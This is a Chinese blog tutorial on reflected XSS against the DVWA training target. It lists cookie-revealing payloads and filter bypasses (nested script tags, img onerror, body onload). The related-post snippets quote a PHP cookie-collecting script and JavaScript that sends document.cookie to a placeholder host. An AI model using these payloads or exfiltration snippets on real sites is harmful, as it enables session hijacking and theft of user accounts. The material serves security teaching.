基于dvwa的反射性xss获取其中的cookie分享篇

已于 2023-05-11 08:43:41 修改
阅读量1.2k 收藏 4
点赞数 2
文章标签: xss 安全 web安全 javascript
于 2023-05-10 22:29:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47319512/article/details/130609840
版权

通过xss弹窗dvwa靶场 的cookie

有意向交流网络安全和人工智能得小伙伴们可以私信相互探讨学习。好废话不多说开搞:

首先我们需要搞懂js(JavaScript)中的一句话:

<script>alert(document.cookie)</script>

接下来打开dvwa将模式调整到

 然后打开 

接下来我们直接输入文章开头的哪一行js代码就可以弹出dvwa中的cookie

<script>alert(document.cookie)</script>

然后就能得到:

medium下的反射性xss:

我们先点开源码进行小小的分析

 然后看源码,注意我标记的地方:

 这句话是正则表达,大概意思是把:前<script>替换成‘空值’,它只会进行一次由此我们有两种方法1.大小写混写(因为JavaScript区分大小写)2.复写多写一个<script>

我才用的是第二种:

输入:

<scr<script>ipt>alert(document.cookie)</script>

然后就得到了:

 high模式下就不做过细的展示了,直接上才艺,点开源码:

 咦,她变了,她变得不爱我了。源码虐我千百遍,我带它如初恋。好切回正题,这段代码的是正则表达意思就是把这些'/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'替换为空值,所以爱不会消失,但是会转移

所以我们需要更换高端表达方式,使用标签,如<img>、<body>等提供的方法进行脚本的注入:

<img src=1 onerror=alert(document.cookie)>
<body onload=alert(document.cookie)>

任上诉代码中一行代码就可以弹出cookie:

 接下来挑战impossible,他们有很多博主说这个解不开,我不信,你也不信。所以上Burp Suite 

抓一个包瞅瞅,然后我们就发现这个世界好小,cookie我们又见面了

需要bp和dvwa和pikaqiu......等靶场搭建的教程和工具包的小伙伴们私信,可私信催更

121122123124125
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
DVWA下的XSS
07-25
DVWA下的XSS
dvwa靶场,里面也有xss靶场
09-24
我的连接数据库用户名是root,密码是123456,自己的不一样的话,在DVWA-master\config目录下config.inc.php文件内修改自己的密码。
利用xss漏洞获取cookie并实现远程登录实验
最新发布
2302_81105681的博客
04-19 197
用beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录。服务器:winserver 2022 (192.168.25.156)攻击机的beef页面中发现受害者上钩,获得受害者的cookie。注意:这个输入框需要按F12在前端代码中修改最长字符。访问到被注入恶意代码的页面,这时受害者还没有察觉到。攻击机登录dvwa,打开存在xss漏洞的页面。本实验用到的环境为:DVWA靶场。攻击机登录的账户为smithy。受害者登录的账户为admin。受害者:win 10。
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 864
XSS
简单的利用XSS获取用户cookie
shy的博客
10-25 4244
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
简单利用XSS获取Cookie信息实例演示
weixin_34088583的博客
03-07 2068
简单利用XSS获取Cookie信息实例演示   首先要找到一个有XXS的站,这里就不整什么大站了,谷歌一下inurl:'Product.asp?BigClassName',搜出来的命中率也比较高。随便找一个,先&lt;script&gt;alert('xxs')&lt;/script&gt;一下。呵呵,框框出来了       再看看自己的Cookie吧,把alert里面的内容换成documen...
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 1712
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2183
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1432
cookie介绍、XSS类型、XSS盗取cookie、利用Cookie劫持会话
xss获取cookie
kiihuang的博客
03-31 816
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 865
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA靶场源码分享
12-11
学习使用,大家一起进步,此资源是为了无法在github上临时下载的同学分享,以备用,不需要积分,如果被调整了积分请联系UP主
DVWA靶场搭建与使用
09-02
DVWA靶场搭建
XSS平台获取cookie
qq_41048303的博客
02-19 3544
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4686
渗透测试-跨站脚本攻击xss获取cookie
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1681
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
XSS利用方式
qq_39654116的博客
01-17 787
目录xss平台利用xss平台地址创建过程页面操作xss直接弹出cookie xss平台利用 xss平台地址 xss.fbisb.com 这个平台上有众多的xss代码 创建过程 点击的项目进行创建 ![[Pasted image 20210109141006.png]] 进入项目创建的构造框,我们进行项目的描述 ![[Pasted image 20210109141019.png]] 配置代码 勾选默认模块与keepsession ![[Pasted image 20210109141102.png]] 下面
dvwa存储型xss获取cookie
06-06
DVWA存储型XSS攻击可以通过注入恶意脚本来获取用户的cookie信息。攻击者可以在DVWA应用程序中的输入框中注入恶意脚本,当用户访问受影响的页面时,恶意脚本会被执行,将用户的cookie信息发送到攻击者的服务器上。攻击者可以利用这些cookie信息来进行身份验证和其他恶意活动。为了防止这种攻击,应该对输入进行过滤和验证,并使用安全的编码实践来编写应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值